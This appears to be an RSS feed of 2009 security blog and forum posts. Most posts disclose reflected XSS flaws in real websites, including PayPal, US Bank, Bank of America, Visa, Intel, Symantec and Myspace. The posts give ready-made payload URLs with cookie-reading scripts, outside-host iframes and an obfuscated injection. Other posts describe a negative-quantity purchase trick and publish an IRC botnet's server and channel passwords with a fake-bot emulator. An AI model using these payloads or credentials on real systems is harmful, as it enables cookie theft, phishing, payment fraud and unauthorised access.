    The problem is, the website is still vulnerable to exactly the same XSS they say it was fixed last month and reported 2 days ago. While it doesn't expose customer information, it exposes visitors to phishing attacks. This is a screenshot made today:

    http://img379.imageshack.us/img379/7480/nortonv.jpg

    Proof of concept link that loads a parody image from http://encyclopediadramatica.com in their 404 page (IE only): https://www.symantec.com/connect/endpoint-management-virtualization/forums")}}document.write(String.fromCharCode(60, 105,109,103,32,115,114,99,61,34,104, 116,116,112,58,47,47,105,109,97,103,101, 115,46,101,110,99,121,99,108,111,112,101,100,105,97,100, 114,97,109,97,116,105,99,97,46,99,111,109,47,105,109,97,103,101,115,47, 97,47,97,50,47,87,104,101,114,101,105,115,121,111,117,114,110,111, 114,116,111,110,110,111,119,46,106,112,103,34,62))</script>

    The problem is a java script that is present in almost all pages on their website. A malformed URL redirects to the 404 page which still has that script.

    Code:
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
      <title>Page not found | Symantec Connect</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <script type="text/javascript">
    var cookies = document.cookie.split(';');
    for (var i=0; i < cookies.length; i++) {
      var cookie = cookies[i].split('=');
      if (cookie[0].match('li') && cookie[1] == 'T') {
        window.location.replace("https://www-secure.symantec.com/connect/endpoint-management-virtualization/forums%22");
      }
    }
    </script>


    Anything appended to "/forums" is not correctly escaped. Their tests probably failed because only IE unescapes %22's to quotes when the location is relaced by a javascript.
    ]]>
    http://nemesis.te-home.net/index.html Tue, 12 May 2009 20:53:14 GMT 2535655175
    <![CDATA[[BayTSP] How to send copyright infringement notices from you to yourself]]> http://nemesis.te-home.net/
    http://webreply.baytsp.com/robots.txt wrote:
    HTTP Status 404 - /robots.txt

    type Status report

    message /robots.txt

    description The requested resource (/robots.txt) is not available.
    Apache Tomcat/5.5.17


    No robots.txt file means robots can index and cache everything from their website. And so they did. Almost all their copyright infringement notices can be found with a search engine. Now we know how a copyright infringement notice looks like. The problem is, everyone can see the form and can attempt to respond to copyright infringement claims. There is no IP check and no authentification. There is no way to tell the form was completed by the right person, especially if a proxy was used (anybody can find them with Google and respond to them). Also, users who have some spyware browser toolbars installed (and there are many) may send all clicked links from their e-mails to 3rd parties. In BayTSP's case, a link is all what it takes for anyone with any IP to be able to access a form and users cannot reply to threatening e-mails directly, because the return address is fake.
    During a test with a customer ID of 160 and a hash of 11111111111111111111111111111111 (which cannot identify a real complaint), XSS vulnerabilities were found. So anybody can send copyright infringement notices in their name and inject iframes with 3rd party content and redirect the response somewhere else.
    The following screenshot demonstrates an XSS attack that injects a poorly formatted fake complaint form (from BayTSP to BayTSP) and an iframe from http://demonoid.com.

    http://img398.imageshack.us/img398/5830/baytsp.jpg

    WARNING: This is a proof of concept, and it doesn't reflect the views of BayTSP.





    ]]>
    http://nemesis.te-home.net/index.html Wed, 13 May 2009 20:30:12 GMT 267866805
    <![CDATA[[IFPI] Can you get paid to read a book ?]]> http://nemesis.te-home.net/ RIAA, MPAA (1, 2, 3, 4), BSA and BayTSP, it's time to do the same for IFPI.org / IFPI.com / IFPI.co.uk / IFPI.org.uk .

    Someone interested in statistics may find their website as an interesting resource - they are selling books with statistics. Too bad the preview pages are broken links (broken links are everywhere on their website, but I wasn't expecting to see them as a marketing strategy).

    http://img206.imageshack.us/img206/2062/ifpibuy1.jpg

    I want to buy "Full 2009 report" (£550) and "Full 2008 report" (£225).

    http://img206.imageshack.us/img206/8590/ifpibuy2.jpg

    In fact... I've changed my mind about the 2009 report, it's too expensive. How do I remove it? Let's update Quantity with -1 to remove that item.

    http://img206.imageshack.us/img206/6264/ifpibuy3.jpg

    Sounds great! I get a book and they pay me £325! Must be some promotional stuff.

    http://img206.imageshack.us/img206/8305/ifpibuy4.jpg

    Yes, the page is vulnerable to XSS (the text I put there is really irrelevant, I wasn't going to buy anything - the company name I tried: --><IMG src="http://img472.imageshack.us/img472/8821/ifpi6xy.jpg"><!-- ). Later I found out you can inject an entire website into that form.

    WARNING: This is a proof of concept and it doesn't reflect the views or interests of IFPI:


    http://img36.imageshack.us/img36/1154/ifpibiz.jpg

    Vulnerabilities in the payment processor they use can be used not only to "buy" anything for free (I'll post more about this later, when it will be fixed), but also to inject HTML code via XSS in other areas of their website.

    http://img36.imageshack.us/img36/2126/ifpi1.jpg

    WARNING: this is a proof of concept and it doesn't reflect the views or interests of IFPI (of course they don't sell toilet paper on their website): Buy toilet paper from IFPI.org

    Same problems with Market Research Publications (redirected to http://87.84.226.196/mro/publications/purchase_publication.asp:

    http://img13.imageshack.us/img13/2506/ifpimro1.jpg

    http://img13.imageshack.us/img13/2306/ifpimro2.jpg

    And, of course, same XSS problems:


    http://img21.imageshack.us/img21/6162/ifpi2k.jpg

    Download Digital File Check (Digital File Check is a real program that can be downloaded from http://www.ifpi.org/dfc/downloads/setup.msi , this is an alternative download page presented via XSS, of course, it is a joke)



    ]]>
    http://nemesis.te-home.net/ Fri, 15 May 2009 21:11:46 GMT 3750760153
    <![CDATA[ A flaw in SagePay makes all client websites vulnerable to XSS, SQLi and fraud<BR>Case study: How to buy toilet paper from IFPI.org]]> http://nemesis.te-home.net/
    Content removed.

    Update #1:
    Sage Pay Support wrote:
    I passed your comments and concerns, a few days ago, to our Live Service team who were able to look at them in detail.

    They are aware of the concept that you have referred to, and will be rolling out an update in the near future to increase security in this area.


    Update #2: Like RIAA.com and MPAA.org, on IFPI.org was not corrected anything, reported bugs remain. However, older links with encrypted parameters no longer work (the password was changed). There still is no visible contact information for reporting security incidents, and e-mails sent to shown addresses that detail security problems are ignored.
    ]]>
    http://nemesis.te-home.net/ Mon, 18 May 2009 19:52:44 GMT 348785359
    <![CDATA[PAYPAL and EBAY still Vulnerable to XSS ]]> http://nemesis.te-home.net/
    Paypal.com  - XSS  

    http://img29.imageshack.us/img29/1008/t1hdrsecurityctr760x156.jpg

    Code:
    http://www.paypal.com/en_US/html/MerchantServices/question.html?step=2&paymentMethodWeb=on&volume="><script>alert(document.cookie)</script>


    http://img32.imageshack.us/img32/6958/paym.jpg

    Code:
    http://www.paypal.com/en_US/html/MerchantServices/question.html?step=2&paymentMethodWeb="><script>alert(String.fromCharCode(88,83,83))</script>


    http://img32.imageshack.us/img32/3664/26495878.jpg

    Code:
    http://www.paypal.com/en_US/html/MerchantServices/question.html?step=5&volume="><script>alert(String.fromCharCode(88,83,83))</script>
       

    http://img140.imageshack.us/img140/4640/123cvy.gif

    A few days ago I have reported other XSS bugs on PayPal and still, new bugs can be found without even looking too hard.

    See also :- PayPal again vulnerable to XSS

    Ebay  - XSS and Iframe injection

    Bugs on search module.

    http://img155.imageshack.us/img155/9523/ebay2d.jpg

    http://img155.imageshack.us/img155/2396/ebaym.jpg   

    See also:-

    Spanish Ebay Vulnerable to XSS

    Multiple Bugs On EBAY.CO.UK Website
    ]]>
    http://nemesis.te-home.net/ Mon, 18 May 2009 22:02:16 GMT 691527912
    <![CDATA[USBANK - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Poc:-
    Code:
    https://fastapp.usbank.com/fastapp/FastAppRouter?requestCmdId=GOFAST&PRODUCT_CODE="><script>alert(document.cookie)</script>

    [IMAGE]http://img259.imageshack.us/img259/5144/38289248.jpg[/IMAGE]
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 19 May 2009 20:28:53 GMT 2421131510
    <![CDATA[BANK OF AMERICA - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://bankofamerica.reo.com/search/propertysearchresults.asp?stateid=&county=&city=&pricelow=0&pricehigh=100000000&bedrooms=0&bathrooms=0&propertytypeid=&zipcode="'/><script>alert(document.cookie)</script>


    http://img259.imageshack.us/img259/6030/36136646.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 19 May 2009 20:32:04 GMT 1676203378
    <![CDATA[AdvTor 0.1.0.1]]> http://nemesis.te-home.net/News/20090521_AdvTor_0_1_0_1.html
    http://nemesis.te-home.net/Img/AdvTor3.gif

            Changes:
    • AdvTor.dll can show the process name and the module that attempts to bypass proxy settings if "Force Tor" is enabled
    • AdvTor.dll supports more operating systems, including Vista
    • AdvTor.dll can also force system services to use Tor
    • added new page: "Become a Server", with options related to sharing bandwidth to help OR network
    • exit policies are split in 2 policy groups, "Accept only" and "Banned IPs / ports"


            Download:
    AdvTor wrote:
    [09:01:42] [notice] Tor v0.2.1.13-alpha. This is experimental software. Do not rely on it for strong anonymity. (Running on Windows 2000 Service Pack 1 [workstation])
    [09:01:44] [notice] We now have enough directory information to build circuits.
    [09:01:44] [notice] Bootstrapped 80%: Connecting to the Tor network.
    [09:01:45] [notice] Bootstrapped 85%: Finishing handshake with first hop.
    [09:01:45] [notice] Bootstrapped 90%: Establishing a Tor circuit.
    [09:01:47] [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
    [09:01:47] [notice] Bootstrapped 100%: Connected to TOR network..
    [09:04:38] [proxy] Connection request for decloak.net:80 .
    [09:04:41] [proxy] Connection request for decloak.net:80 .
    [09:04:43] [proxy] Connection request for decloak.net:80 .
    [09:04:43] [proxy] Connection request for decloak.net:80 .
    [09:04:43] [proxy] Connection request for decloak.net:80 .
    [09:04:44] [proxy] Connection request for decloak.net:80 .
    [09:04:49] [proxy] Connection request for decloak.net:80 .
    [09:04:51] [proxy] Connection request for decloak.net:80 .
    [09:04:51] [proxy] Connection request for decloak.net:80 .
    [09:04:51] [proxy] Connection request for 53505c8270b6334060049c3ab581fa35.http.62.85.124.125.0.0.0.0.spy.decloak.net:80 .
    [09:04:51] [proxy] Connection request for 53505c8270b6334060049c3ab581fa35.ftp.62.85.124.125.0.0.0.0.spy.decloak.net:21 .
    [09:04:51] [proxy] Connection request for decloak.net:80 .
    [09:04:52] [proxy] Connection request for 53505c8270b6334060049c3ab581fa35.quicktime.62.85.124.125.0.0.0.0.spy.decloak.net:80 .
    [09:04:57] [proxy] Opera.exe [NPSWF32.dll]: Attempt to bypass proxy settings with address 66.240.213.71:843 .
    [09:04:57] [proxy] Connection request for 66.240.213.71:843 .
    [09:04:58] [proxy] Opera.exe [NPSWF32.dll]: Attempt to bypass proxy settings with address 66.240.213.71:53530 .
    [09:04:58] [proxy] Connection request for 66.240.213.71:53530 .
    [09:05:00] [proxy] Opera.exe [NPSWF32.dll]: Attempt to bypass proxy settings with address 66.240.213.71:53530 .
    [09:05:00] [proxy] Connection request for 66.240.213.71:53530 .
    [09:05:13] [proxy] Connection request for decloak.net:80 .
    [09:05:21] [proxy] Connection request for 53505c8270b6334060049c3ab581fa35.quicktime.62.85.124.125.0.0.0.0.spy.decloak.net:80 .
    [09:05:22] [proxy] Connection request for decloak.net:80 .

    ]]>
    http://nemesis.te-home.net/News/20090521_AdvTor_0_1_0_1.html?cpage=1 Thu, 21 May 2009 06:54:00 GMT 2379817273
    <![CDATA[Myspace Critical XSS Bugs]]> http://nemesis.te-home.net/index.html?news
    1 - XSS   

    Code:
    http://viewmorepics.myspace.com/index.cfm?fuseaction=user.viewPicture&friendID=115169945&albumId=1572486"><script>alert(document.cookie)</script>


    http://img268.imageshack.us/img268/4205/95360828.jpg

    http://img268.imageshack.us/img268/4930/75958552.jpg

    http://img268.imageshack.us/img268/3681/43774297.jpg
    some new WORM ? =))

    2 - XSS Redirect  

    Code:
    http://www.myspace.com/Modules/PostTo/Pages/DefaultV1.aspx?t=<A HREF="//www.google.com/">XSS</A>


    http://img268.imageshack.us/img268/4500/26777839.jpg

    http://img42.imageshack.us/img42/2933/82499792.jpg

    Demo:-

    http://www.youtube.com/watch?v=tTkOPxv9L4M

    This is only a Proof of Concept So We Will Not Be Responsible for Any Damage

    ]]>
    http://nemesis.te-home.net/index.html?news Thu, 21 May 2009 22:16:32 GMT 3478218514
    <![CDATA[XSS Studio Presents...]]> http://nemesis.te-home.net/News/20090522_XSS_Studio_Presents___.html http://www.imdb.com I found out that it is vulnerable to XSS. There are various ways a vulnerability like this can be exploited. As an example, we can make an IMDB page for a movie that doesn't exist - "You Wouldn't Download a Car".

    http://img211.imageshack.us/img211/1463/imdb.gif

    Now let's give some Oscars to it. There are many XSS vulnerabilities in http://www.oscars.org. Some vulnerable pages include:
    • http://awardsdatabase.oscars.org/ampas_awards/DisplayMain.jsp?BSFilmTitle=XSS
    • http://photos.oscars.org/allimages.php?events=&gpl=current&pg=6+XSS
    • http://awardsdatabase.oscars.org/ampas_awards/BasicSearchInput.jsp?BSFilmTitle=XSS
    • http://wwwdb.oscars.org:8100/servlet/impc.AdvancedSearch
    • http://wwwdb.oscars.org:8100/servlet/impc.FilmTitleServlet
    • http://wwwdb.oscars.org:8100/servlet/impc.YearBrowse


    Proof of concept link: You Wouldn't Download a Car Awards.

    http://img141.imageshack.us/img141/1976/oscars.gif

    MPAA Movie Rating websites are still vulnerable to same reported bugs, so we can get a fake MPAA rating for this movie. And we can also include the IMDB page and the Oscar link as XSS. To do that, we escape all special characters from the HTML code of our form that takes to the fake IMDB page and our link that uses the XSS in oscars.org.

    http://img249.imageshack.us/img249/2638/rating.jpg

    Our fake movie rating, fake Oscar link and the fake IMDB page can be called via XSS from MPAA.org, which is still vulnerable to same reported XSS (anybody can use their Search function to find the new name for the known vulnerable file - BTW the old proof of concept links are updated to this change so you can still browse torrents on MPAA.org). Now we can have a "triple XSS", we inject via XSS in MPAA.org a XSS call to movieratings.org which calls XSS from IMDB.com and from www.oscars.org (XSS in XSS in XSS), and also the XSS from IMDB.com and www.oscars.org. To do that, all special characters are escaped again (&, ", ', +, <, >) and the code is included as a hidden txtfavoritemovie value. And we can choose one of the movie studio websites which are still vulnerable to XSS to make a nice presentation page.

    http://img520.imageshack.us/img520/5905/mpaathank.jpg

    This shows how the influence of a website can propagate via XSS through links clicked on other websites.

    Click here for proof of concept links and forms.
    ]]>
    http://nemesis.te-home.net/News/20090522_XSS_Studio_Presents___.html?cpage=1 Fri, 22 May 2009 08:13:03 GMT 599593692
    <![CDATA[Paypoint - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    https://www.paypoint.net/partners/pay-per-signup/?"><script>alert(String.fromCharCode(88,83,83))</script>


    http://img297.imageshack.us/img297/2403/49579272.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Fri, 22 May 2009 20:10:47 GMT 1447174347
    <![CDATA[RBS World Pay - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.rbsworldpay.com/support/search/search.php?search=1&country="><script>alert(String.fromCharCode(88,83,83))</script>

    Code:
    http://www.rbsworldpay.com/support/search/search.php?search=1&country="<iframe%20src=http://nemesis.te-home.net/index.html?news'>


    http://img297.imageshack.us/img297/3889/39909570.jpg
    http://img297.imageshack.us/img297/8428/53085113.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Fri, 22 May 2009 20:13:18 GMT 4177906975
    <![CDATA[XSS on GFI Languard]]> http://nemesis.te-home.net/index.html http://www.gfi.com  

    Quote:
    GFI LANguard™ is the award-winning network security and vulnerability scanner that gives you the power to scan, detect, assess and correct any potential security risk on your network.


    Bugs on Search Module:
    http://img9.imageshack.us/img9/2734/92481672.jpg

    http://img9.imageshack.us/img9/3706/89566828.jpg

    WARNING: This is a proof of concept that doesn't reflect the views of GFI Software:

    ]]>
    http://nemesis.te-home.net/index.html Sun, 24 May 2009 12:38:03 GMT 3232407826
    <![CDATA[AllianzTiriac -XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    http://img38.imageshack.us/img38/2002/23559725.gif
    http://img38.imageshack.us/img38/1863/16698180.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 24 May 2009 19:25:03 GMT 495366966
    <![CDATA[Intel.com - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ POC:

    Code:
    http://membersresource.intel.com/search/ddl/download/DDLAgreement.asp?Genre}"'/><script>alert(String.fromCharCode(88,83,83))</script>


    http://img21.imageshack.us/img21/6705/56965536.jpg

    Code:
    http://membersresource.intel.com/search/ddl/download/DDLAgreement.asp?Genre'"></title><script>alert(xss)</script>><marquee><h1>XSS</h1></marquee>


    http://img21.imageshack.us/img21/7964/50111664.jpg

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 24 May 2009 20:15:32 GMT 2145792885
    <![CDATA[McAfee XSSecure Website]]> http://nemesis.te-home.net/News/20090524_McAfee_XSSecure.html
    www.mcafeesecure.com wrote:
    This site is tested and certified daily to pass the "McAfee Secure" Security Scan. To help address concerns about possible hacker access to your confidential data, and the safety of visiting this site, the "live" McAfee Secure mark appears only when this site passes the daily McAfee Secure tests.


    What does this mean? Let's see...

    Shopping for debugging information with full stack backtrace: Test

    http://img24.imageshack.us/img24/5219/mcafee3.jpg

    A XSS and an Open Redirect allow anyone to inject HTML code in http://secureshopping.mcafee.com:

    http://img24.imageshack.us/img24/3679/mcafee1.jpg

    http://img145.imageshack.us/img145/43/mcafee2.jpg

    WARNING: This is a proof of concept and it doesn't reflect the views of McAfee: Test XSS
    And of course, this allows anyone to have a fake McAfee Secure Certification. A "McFake Secure CERTIFICATION" for http://nemesis.te-home.net (of course, it's fake):

    http://img297.imageshack.us/img297/6854/mcfake.gif

    WARNING: this is a proof of concept and it doesn't reflect the views of McAfee (nemesis.te-home.net doesn't have and doesn't need any certification):

    ]]>
    http://nemesis.te-home.net/News/20090524_McAfee_XSSecure.html?cpage=1 Sun, 24 May 2009 22:18:39 GMT 1468999078
    <![CDATA[XSS on Tczew Websites]]> http://nemesis.te-home.net/
    http://img43.imageshack.us/img43/4858/73805108.gif

    WARNING: This is just a proof of concept. Visit http://tcz.pl

    Type in the "Szukaj" box for example:
    Code:
    <IMG src='http://nemesis.te-home.net/Img/logo.jpg'><BR><BR><IFRAME width='100%' height='600px' src='http://nemesis.te-home.net'>


    to see the bug.
    ']['€AM€LiT€]]>
    http://nemesis.te-home.net/ Mon, 25 May 2009 00:31:13 GMT 2311744195
    <![CDATA[XSS on Tczew Website#2]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://tczew.pl/index.php?akcja=szukaj&szukaj=%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E


    http://img35.imageshack.us/img35/3891/48530686.gif

    Code:
    http://tczew.pl/index.php?akcja=szukaj&szukaj=%3CIMG%20src='http://nemesis.te-home.net/Img/logo.jpg'%3E%3CBR%3E%3CBR%3E%3CIFRAME%20width='100%'%20height='600px'%20src='http://nemesis.te-home.net'%3E


    http://img35.imageshack.us/img35/9279/96158957.gif
    ']['€AM€LiT€]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Mon, 25 May 2009 08:12:31 GMT 3013374084
    <![CDATA[XSS on porta.unesco.org]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://portal.unesco.org/search/ui/SearchServlet?formName=test2&hIndexName=ami_index&nbResultByPage=25&hUrlTemplateResult=http%3A%2F%2Fportal.unesco.org%2Fsearch%2Fen%2Fresults.html&output=text%2Fhtml&hPrefPages=prefpages&hPRMetaWeight=&hPRWordlistWeight=7&hPRTitleField=7&hPRDescriptionField=3&hPRReferenceField=10&rThesaurus=&tUserInput=%27%2F%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&fOk.x=11&fOk.y=10


    http://img20.imageshack.us/img20/7969/unescos.gif

    Code:
    http://portal.unesco.org/search/ui/SearchServlet?formName=test2&hIndexName=ami_index&nbResultByPage=25&hUrlTemplateResult=http%3A%2F%2Fportal.unesco.org%2Fsearch%2Fen%2Fresults.html&output=text%2Fhtml&hPrefPages=prefpages&hPRMetaWeight=&hPRWordlistWeight=7&hPRTitleField=7&hPRDescriptionField=3&hPRReferenceField=10&rThesaurus=&tUserInput=%3CIMG+src%3D%27http%3A%2F%2Fnemesis.te-home.net%2FImg%2Flogo.jpg%27%3E%3CBR%3E%3CBR%3E%3CIFRAME+width%3D%27100%25%27+height%3D%27600px%27+src%3D%27http%3A%2F%2Fnemesis.te-home.net%27%3E&fOk.x=12&fOk.y=11


    http://img20.imageshack.us/img20/9471/unesco2.gif
    ']['€AM€LiT€]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Mon, 25 May 2009 08:42:31 GMT 2652552147
    <![CDATA[Fileshack.com - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.fileshack.com/search.x?terms=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&search_for=0&type=files


    img35.imageshack.us/img35/1774/filechackcomxss.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Mon, 25 May 2009 12:42:55 GMT 3394957524
    <![CDATA[store.Steampowered.com - Xss]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://store.steampowered.com/search/?term=%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fnemesis.te-home.net%22+width%3D%22500%22+height%3D%22500%22%3E


    http://img39.imageshack.us/img39/9846/storesteampoweredcomxss.jpg

    I tried to find way to contact steam to report this.. But all contact options required a "Steam Account" which i donŽt have or plan to get
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Mon, 25 May 2009 12:49:16 GMT 3754800400
    <![CDATA[Juniper.net - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.juniper.net/us/en/search/search.do?cmd=search&ht=0&bn=1&rq=0&qm=0&st=1&rq=0&pw=100%25&si=1&qm=0&rf=0&lk=1&ws=0&qt=%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fnemesis.te-home.net%22+width%3D%22500%22+height%3D%22500%22%3E&nh=10&col=wwwpub&webfilter=url%3A%2Fus%2Fen%2F&col=techpubs&selectedprod=allprodnew


    http://img198.imageshack.us/img198/8770/junipernetxss.jpg


    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Mon, 25 May 2009 13:00:10 GMT 1921689029
    <![CDATA[Schacknews.com - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.shacknews.com/search.x?terms=%22%3E%3Ciframe%20src="http://nemesis.te-home.net"%20width="500"%20height="400"%3E


    http://img43.imageshack.us/img43/7651/shacknewscomxss.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Mon, 25 May 2009 13:23:17 GMT 1338212309
    <![CDATA[Revver.com - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://revver.com/find/video/?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&search_on=search



    http://img43.imageshack.us/img43/3614/revvercomxss.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Mon, 25 May 2009 13:23:46 GMT 3582330044
    <![CDATA[XSS Bugs on multiple Visa Websites ]]> http://nemesis.te-home.net/ http://img193.imageshack.us/img193/2397/visalogo.gif

    Poc:
    Code:
    http://usa.visa.com/cardadvisor/CardAdvisorBusinessSearch?navigation=RESULTS_SUMMARY&QB1=LA&QB2="><script>alert(String.fromCharCode(88,83,83))</script>


    http://img193.imageshack.us/img193/999/77238451.jpg
    http://img193.imageshack.us/img193/1592/25604783.jpg  

    Code:
    http://www.visacemea.com/?country='"></title><script>alert(1337)</script>'"><marquee><h1>"><script>alert("XSS")</script>%20</h1></marquee>


    http://img193.imageshack.us/img193/4776/82322077.jpg
    http://img193.imageshack.us/img193/9688/56745008.jpg

    Code:
    http://www.visa.com.ua/?country='"></title><script>alert(1337)</script>'"><marquee><h1>"><script>alert("XSS")</script>%20</h1></marquee>


    http://img193.imageshack.us/img193/7373/23473360.jpg


    Same bug can be found on  http://www.visamiddleeast.com/main_home.jsp?country=  
    Code:
    http://www.visamiddleeast.com/main_home.jsp?country='"></title><script>alert(1337)</script>'"><marquee><h1>"><script>alert("XSS")</script>%20</h1></marquee>


    This is just a simple Proof of Concept,these bugs allow someone to inject malicious scripts and to infect visitors with malware!
    Visa Staff has been alerted about this and we hope they fix them quickly.

    ]]>
    http://nemesis.te-home.net/ Tue, 26 May 2009 19:47:42 GMT 152587437
    <![CDATA[How to shutdown a IRC botnet]]> http://nemesis.te-home.net/Forum/3000_News/20090526_How_to_destroy_an_IRC_botnet.html
    š°o-OpChat-o°š wrote:
    [20:51:29] <š°o-OpChat-o°š> *** PM Flood detected: Te-ai gandit vreodata ca poti downloada de 3x ca viteza dupa ODc? sau oricare alt client? daca vrei sa incerci downloadeaza programul special proiectat de aici http://81.196.95.22:528/Speed-Extreme.rar sper sa-ti placa --- ZdgYx -- IP=' 81.196.95.22 ' Host='  ' User=' [ROXANA]iySlE '


    We see spam like this everywhere. And it's not hard to guess who the spammer is.

    Quote:
    [22:59] *** User list (81.196.95.22 - 81.196.95.22)

    [RO]Toxic_Snake 81.196.95.22, connected: 2009-05-21 06:19:39 for 10 hours 29 minutes 22 seconds
    [RO]Toxic_Snake 81.196.95.22, connected: 2009-05-21 16:54:41 for 3 hours 41 minutes 43 seconds
    [RO]Toxic_Snake 81.196.95.22, connected: 2009-05-21 22:34:27 for 46 minutes 50 seconds
    [RO]Toxic_Snake 81.196.95.22, connected: 2009-05-22 13:49:44 for 7 hours 1 minutes 39 seconds
    [RO]Toxic_Snake 81.196.95.22, connected: 2009-05-23 22:56:51 for 1 hours 41 minutes 32 seconds


    Speed-Extreme.rar, hosted by the spammer himself, is a modified RxBot trojan (the executable is encrypted, but that's not a problem) that connects to a IRC server hosted by, of course, the spammer himself. BTW, VirusTotal is a great service, it submits all samples to all antivirus companies. Yesterday no antivirus detected this RxBot dropper because of encryption and in just one day half of them detect it already.

    • Server address: server.unlimited-network.ro:6667 (81.196.95.22, static IP)
    • Server password: thepartofmindhack
    • Join channel: #privatecanal
    • Channel password: thepartofmindhack
    • Prefix used by bots: n-*


    We have enough information to login as a fake bot. Making an emulator for RxBot is easy. As an example, the version for DirectConnect clients can be downloaded from here: http://nemesis.te-home.net/Forum/3000_News/RxBotEmulator.zip (Creative Commons, Attribution-NonCommercial-ShareAlike 3.0). This version of emulator creates a "virtual hub" (more users can join a virtual hub, but all their chat is translated as coming from connected fake bot(s)), you can use your nick and you will see your nick when you connect to it, but the emulator translates your traffic accoding to the bot information you provide.

    http://img29.imageshack.us/img29/7948/emulator.gif

    It doesn't support proxies, but AdvTor can "force" it to go through Tor anyway. Joining the channel as a fake bot...

    Quote:
    [2009-05-26 22:27] *** Looking up your hostname
    [2009-05-26 22:27] *** Checking Ident
    [2009-05-26 22:27] *** Couldn't look up your hostname
    [2009-05-26 22:27] *** No ident response
    [2009-05-26 22:27] <my.server.name> MODE :Register first.
    [2009-05-26 22:28] <my.server.name> Welcome to the Internet Relay Network n-144452
    Your host is my.server.name, running version beware1.5.7
    This server was created Tue Jul 13 2004 at 20:36:07 GMT
    my.server.name beware1.5.7 dgikoswx biklmnoprstv
    MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server
    [2009-05-26 22:28] <my.server.name> NICKLEN=9 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server
    There are 104 users and 0 invisible on 1 servers
    1 :channels formed
    I have 104 clients and 0 servers
    [2009-05-26 22:28] *** n-144452 Highest connection count: 116 (116 clients)
    [2009-05-26 22:28] <my.server.name> MOTD File is missing
    [2009-05-26 22:28] *** n-144452 on 1 ca 1(4) ft 10(10)
    [2009-05-26 22:28] *** Joins: n-292348
    [2009-05-26 22:28] *** Joins: n-684753
    [2009-05-26 22:28] *** Joins: n-895030
    [2009-05-26 22:28] *** Joins: n-125554
    [2009-05-26 22:28] *** Joins: n-073959
    [2009-05-26 22:28] *** Joins: n-397296
    [2009-05-26 22:28] *** Joins: n-497894
    [2009-05-26 22:28] *** Joins: n-718491
    [2009-05-26 22:28] *** Joins: n-571058
    [2009-05-26 22:28] *** Joins: n-896928
    [2009-05-26 22:28] *** Joins: n-851344
    [2009-05-26 22:28] *** Joins: n-709284
    [2009-05-26 22:28] *** Joins: n-151753
    [2009-05-26 22:28] *** Joins: n-139850
    [2009-05-26 22:28] *** Joins: n-121286
    [2009-05-26 22:28] *** Joins: n-506956
    [2009-05-26 22:28] *** Joins: n-536251
    [2009-05-26 22:28] *** Joins: n-573696
    [2009-05-26 22:28] *** Joins: n-105601
    [2009-05-26 22:28] *** Joins: n-763665
    [2009-05-26 22:28] *** Joins: n-658591
    [2009-05-26 22:28] *** Joins: n-797870
    [2009-05-26 22:28] *** Joins: n-915282
    [2009-05-26 22:28] *** Joins: n-568861
    [2009-05-26 22:28] *** Joins: n-418650
    [2009-05-26 22:28] *** Joins: n-435013
    [2009-05-26 22:28] *** Joins: n-611304
    [2009-05-26 22:28] *** Joins: n-813976
    [2009-05-26 22:28] *** Joins: n-138896
    [2009-05-26 22:28] *** Joins: n-482175
    [2009-05-26 22:28] *** Joins: n-623429
    [2009-05-26 22:28] *** Joins: n-833356
    [2009-05-26 22:28] *** Joins: n-838578
    [2009-05-26 22:28] *** Joins: n-734028
    [2009-05-26 22:28] *** Joins: n-502610
